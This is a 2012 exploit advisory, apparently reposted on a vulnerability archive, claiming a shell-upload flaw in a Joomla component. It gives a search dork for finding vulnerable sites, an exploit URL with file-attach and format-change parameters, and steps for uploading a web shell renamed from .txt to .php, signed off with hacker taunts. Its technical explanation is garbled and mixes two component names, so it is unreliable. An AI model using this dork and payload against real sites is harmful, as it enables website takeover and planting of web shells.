Joomla bch and Content Shell Upload

2012.12.28
Credit: Agd_Scorp
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264
Dork: inurl:\"/index.php?option=com_bch\"

[ Joomla com_content Shell Upload Vulnerability] [x] Author : Agd_Scorp [x] Home : www.turkguvenligi.info (former) [x] E-mail : vorscorp@hotmail.com [x] Found : Mon, Dec 24, 2012 [x] Tested : Windows 7, Ubuntu, Gentoo [x] Dork : inurl:"/index.php?option=com_bch" ________________________________________________________________ **************************************************************** [x] The Conlusion The vulnerability resides at 'cont' parameter, which is often used for reconnecting the SQL database to the website in-order to gain information that is being provided by the administrator, although, if a few parameters are added as an extention-act, files can be uploaded, and therefore, more risk shall occur. [x] Vuln Exploit Report: http://localhost/index.php?option=com_content&cont=sendfile?controller&attach_file=[FILE LINK]&chformat=php (or any other you want it to change into) [x] Uploading a Shell First, change your shell's format into .txt, then extract into that, when uploaded, and chformat parameter is added, it will be automatically be changed into *.php, therefore, your shell is spawned. [x] Note: h4ck y0u... kill y0u... 0wn y0u.... - TURKGUVENLIGI -

References:

http://www.turkguvenligi.info/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top